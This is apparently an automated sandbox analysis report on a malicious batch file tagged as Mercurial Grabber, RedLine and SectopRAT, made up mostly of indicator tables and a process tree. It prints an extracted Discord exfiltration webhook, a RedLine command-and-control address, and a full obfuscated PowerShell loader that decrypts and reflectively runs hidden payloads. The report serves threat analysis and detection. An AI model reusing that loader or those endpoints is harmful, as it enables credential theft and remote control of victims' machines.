mercurialgrabber | c08bf46d6faaf447bf8b8a5a6c475873d1c2c47723fdc19ebf3f657fb8413e3f

Analysis

max time kernel
300s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
29-04-2024 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

23.4MB
MD5

058512c3d0827870573edbda5ac7e397
SHA1

17e74897a99a396ace8de33a9a2c844fe0d85a55
SHA256

c08bf46d6faaf447bf8b8a5a6c475873d1c2c47723fdc19ebf3f657fb8413e3f
SHA512

076c6e1966254d2f8edc726e8bd61774c8742c36731616dfbfb5b13b868af66a7b5e04d0958e051a13e0f3bb9f62b63a88df7162ab2a5dba34b5a0fd8c15f233
SSDEEP

49152:r1A4BWF3lwVZsfLZvDY72/3i5iz8WvWWMjNHGeTCK1Bs0+hG4mAK5Pp86mSFzbkz:r4

Score

10^/10

mercurialgrabber redline sectoprat fake slinky infostealer rat stealer trojan

Malware Config

Extracted

Family

mercurialgrabber

https://discord.com/api/webhooks/1234301738757001307/J48FrxcIY2MznyD-QrXgOrGXbnFfNRD0MMNNy87Y34EWKexlEGM_on4JdcwW4I6PtUzz

Extracted

Family

redline

Botnet

Fake Slinky

ii-restored.gl.at.ply.gg:43416

Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0019000000023b86-35.dat	family_redline
behavioral2/memory/1632-42-0x00000000001D0000-0x00000000001EE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0019000000023b86-35.dat	family_sectoprat
behavioral2/memory/1632-42-0x00000000001D0000-0x00000000001EE000-memory.dmp	family_sectoprat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
28	4024	powershell.exe
33	4024	powershell.exe
35	4024	powershell.exe
37	4024	powershell.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3411335054-1982420046-2118495756-1000\Control Panel\International\Geo\Nation	slinkyloader.exe

Executes dropped EXE 64 IoCs

pid	Process
368	slinkyloader.exe
1632	build.exe
976	slinkyloader.exe
3952	build.exe
4716	slinkyloader.exe
740	build.exe
1612	slinkyloader.exe
624	build.exe
4504	slinkyloader.exe
4996	build.exe
4836	slinkyloader.exe
1664	build.exe
4092	slinkyloader.exe
1596	build.exe
4220	slinkyloader.exe
5084	build.exe
1060	slinkyloader.exe
2592	build.exe
2204	slinkyloader.exe
3440	build.exe
5040	slinkyloader.exe
4608	build.exe
3636	slinkyloader.exe
1760	build.exe
4224	slinkyloader.exe
448	build.exe
2148	slinkyloader.exe
2204	build.exe
408	slinkyloader.exe
3636	build.exe
556	slinkyloader.exe
5016	build.exe
2372	slinkyloader.exe
408	build.exe
3960	slinkyloader.exe
4352	build.exe
5164	slinkyloader.exe
5276	build.exe
5312	slinkyloader.exe
5560	build.exe
5604	slinkyloader.exe
5928	build.exe
5972	slinkyloader.exe
6084	build.exe
5136	slinkyloader.exe
5288	build.exe
368	slinkyloader.exe
5348	build.exe
5412	slinkyloader.exe
5712	build.exe
5812	slinkyloader.exe
5840	build.exe
5944	slinkyloader.exe
5992	build.exe
5236	slinkyloader.exe
5232	build.exe
5532	slinkyloader.exe
5760	build.exe
3356	slinkyloader.exe
1732	build.exe
3048	slinkyloader.exe
6100	build.exe
6064	slinkyloader.exe
4964	build.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
34	discord.com
35	discord.com
37	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip4.seeip.org
28	ip4.seeip.org
31	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4024	powershell.exe
4024	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	1632	build.exe
Token: SeDebugPrivilege	3952	build.exe
Token: SeDebugPrivilege	740	build.exe
Token: SeDebugPrivilege	624	build.exe
Token: SeDebugPrivilege	4996	build.exe
Token: SeDebugPrivilege	1664	build.exe
Token: SeDebugPrivilege	1596	build.exe
Token: SeDebugPrivilege	5084	build.exe
Token: SeDebugPrivilege	2592	build.exe
Token: SeDebugPrivilege	3440	build.exe
Token: SeDebugPrivilege	4608	build.exe
Token: SeDebugPrivilege	1760	build.exe
Token: SeDebugPrivilege	448	build.exe
Token: SeDebugPrivilege	2204	build.exe
Token: SeDebugPrivilege	3636	build.exe
Token: SeDebugPrivilege	5016	build.exe
Token: SeDebugPrivilege	408	build.exe
Token: SeDebugPrivilege	4352	build.exe
Token: SeDebugPrivilege	5276	build.exe
Token: SeDebugPrivilege	5560	build.exe
Token: SeDebugPrivilege	5928	build.exe
Token: SeDebugPrivilege	6084	build.exe
Token: SeDebugPrivilege	5288	build.exe
Token: SeDebugPrivilege	5348	build.exe
Token: SeDebugPrivilege	5712	build.exe
Token: SeDebugPrivilege	5840	build.exe
Token: SeDebugPrivilege	5992	build.exe
Token: SeDebugPrivilege	5232	build.exe
Token: SeDebugPrivilege	5760	build.exe
Token: SeDebugPrivilege	1732	build.exe
Token: SeDebugPrivilege	6100	build.exe
Token: SeDebugPrivilege	4964	build.exe
Token: SeDebugPrivilege	6000	build.exe
Token: SeDebugPrivilege	3652	build.exe
Token: SeDebugPrivilege	632	build.exe
Token: SeDebugPrivilege	3940	build.exe
Token: SeDebugPrivilege	3368	build.exe
Token: SeDebugPrivilege	6308	build.exe
Token: SeDebugPrivilege	6452	build.exe
Token: SeDebugPrivilege	6604	build.exe
Token: SeDebugPrivilege	6760	build.exe
Token: SeDebugPrivilege	6904	build.exe
Token: SeDebugPrivilege	7056	build.exe
Token: SeDebugPrivilege	4232	build.exe
Token: SeDebugPrivilege	6436	build.exe
Token: SeDebugPrivilege	4124	build.exe
Token: SeDebugPrivilege	6888	build.exe
Token: SeDebugPrivilege	5592	build.exe
Token: SeDebugPrivilege	6192	build.exe
Token: SeDebugPrivilege	1132	build.exe
Token: SeDebugPrivilege	7040	build.exe
Token: SeDebugPrivilege	3208	build.exe
Token: SeDebugPrivilege	7308	build.exe
Token: SeDebugPrivilege	7456	build.exe
Token: SeDebugPrivilege	7604	build.exe
Token: SeDebugPrivilege	7752	build.exe
Token: SeDebugPrivilege	7904	build.exe
Token: SeDebugPrivilege	8052	build.exe
Token: SeDebugPrivilege	1200	build.exe
Token: SeDebugPrivilege	7296	build.exe
Token: SeDebugPrivilege	2296	build.exe
Token: SeDebugPrivilege	5460	build.exe
Token: SeDebugPrivilege	7884	build.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 4024	1648	cmd.exe	88
PID 1648 wrote to memory of 4024	1648	cmd.exe	88
PID 4024 wrote to memory of 368	4024	powershell.exe	98
PID 4024 wrote to memory of 368	4024	powershell.exe	98
PID 368 wrote to memory of 1632	368	slinkyloader.exe	100
PID 368 wrote to memory of 1632	368	slinkyloader.exe	100
PID 368 wrote to memory of 1632	368	slinkyloader.exe	100
PID 368 wrote to memory of 976	368	slinkyloader.exe	102
PID 368 wrote to memory of 976	368	slinkyloader.exe	102
PID 4024 wrote to memory of 1596	4024	powershell.exe	103
PID 4024 wrote to memory of 1596	4024	powershell.exe	103
PID 976 wrote to memory of 3952	976	slinkyloader.exe	105
PID 976 wrote to memory of 3952	976	slinkyloader.exe	105
PID 976 wrote to memory of 3952	976	slinkyloader.exe	105
PID 976 wrote to memory of 4716	976	slinkyloader.exe	107
PID 976 wrote to memory of 4716	976	slinkyloader.exe	107
PID 4716 wrote to memory of 740	4716	slinkyloader.exe	108
PID 4716 wrote to memory of 740	4716	slinkyloader.exe	108
PID 4716 wrote to memory of 740	4716	slinkyloader.exe	108
PID 4716 wrote to memory of 1612	4716	slinkyloader.exe	110
PID 4716 wrote to memory of 1612	4716	slinkyloader.exe	110
PID 1612 wrote to memory of 624	1612	slinkyloader.exe	111
PID 1612 wrote to memory of 624	1612	slinkyloader.exe	111
PID 1612 wrote to memory of 624	1612	slinkyloader.exe	111
PID 1612 wrote to memory of 4504	1612	slinkyloader.exe	113
PID 1612 wrote to memory of 4504	1612	slinkyloader.exe	113
PID 4504 wrote to memory of 4996	4504	slinkyloader.exe	115
PID 4504 wrote to memory of 4996	4504	slinkyloader.exe	115
PID 4504 wrote to memory of 4996	4504	slinkyloader.exe	115
PID 4504 wrote to memory of 4836	4504	slinkyloader.exe	117
PID 4504 wrote to memory of 4836	4504	slinkyloader.exe	117
PID 4836 wrote to memory of 1664	4836	slinkyloader.exe	118
PID 4836 wrote to memory of 1664	4836	slinkyloader.exe	118
PID 4836 wrote to memory of 1664	4836	slinkyloader.exe	118
PID 4836 wrote to memory of 4092	4836	slinkyloader.exe	120
PID 4836 wrote to memory of 4092	4836	slinkyloader.exe	120
PID 4092 wrote to memory of 1596	4092	slinkyloader.exe	121
PID 4092 wrote to memory of 1596	4092	slinkyloader.exe	121
PID 4092 wrote to memory of 1596	4092	slinkyloader.exe	121
PID 4092 wrote to memory of 4220	4092	slinkyloader.exe	123
PID 4092 wrote to memory of 4220	4092	slinkyloader.exe	123
PID 4220 wrote to memory of 5084	4220	slinkyloader.exe	125
PID 4220 wrote to memory of 5084	4220	slinkyloader.exe	125
PID 4220 wrote to memory of 5084	4220	slinkyloader.exe	125
PID 4220 wrote to memory of 1060	4220	slinkyloader.exe	127
PID 4220 wrote to memory of 1060	4220	slinkyloader.exe	127
PID 1060 wrote to memory of 2592	1060	slinkyloader.exe	128
PID 1060 wrote to memory of 2592	1060	slinkyloader.exe	128
PID 1060 wrote to memory of 2592	1060	slinkyloader.exe	128
PID 1060 wrote to memory of 2204	1060	slinkyloader.exe	130
PID 1060 wrote to memory of 2204	1060	slinkyloader.exe	130
PID 2204 wrote to memory of 3440	2204	slinkyloader.exe	131
PID 2204 wrote to memory of 3440	2204	slinkyloader.exe	131
PID 2204 wrote to memory of 3440	2204	slinkyloader.exe	131
PID 2204 wrote to memory of 5040	2204	slinkyloader.exe	133
PID 2204 wrote to memory of 5040	2204	slinkyloader.exe	133
PID 5040 wrote to memory of 4608	5040	slinkyloader.exe	134
PID 5040 wrote to memory of 4608	5040	slinkyloader.exe	134
PID 5040 wrote to memory of 4608	5040	slinkyloader.exe	134
PID 5040 wrote to memory of 3636	5040	slinkyloader.exe	136
PID 5040 wrote to memory of 3636	5040	slinkyloader.exe	136
PID 3636 wrote to memory of 1760	3636	slinkyloader.exe	137
PID 3636 wrote to memory of 1760	3636	slinkyloader.exe	137
PID 3636 wrote to memory of 1760	3636	slinkyloader.exe	137

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HfNNYlgEmRA+ryhJ6y3KeWwmRsA3EpQSXrZHnK4Ec3g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B7FoHzWUOgX2ubyvo9N4sw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SaFMf=New-Object System.IO.MemoryStream(,$param_var); $RGSkW=New-Object System.IO.MemoryStream; $GBVmt=New-Object System.IO.Compression.GZipStream($SaFMf, [IO.Compression.CompressionMode]::Decompress); $GBVmt.CopyTo($RGSkW); $GBVmt.Dispose(); $SaFMf.Dispose(); $RGSkW.Dispose(); $RGSkW.ToArray();}function execute_function($param_var,$param2_var){ $zvFjl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RRizq=$zvFjl.EntryPoint; $RRizq.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\test.bat';$CEdvn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($wwHnM in $CEdvn) { if ($wwHnM.StartsWith(':: ')) { $QpkiF=$wwHnM.Substring(3); break; }}$payloads_var=[string[]]$QpkiF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
    "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:368
  - - C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
      "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:976
    - - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3952
    - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4716
      - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
      - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        Executes dropped EXE
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
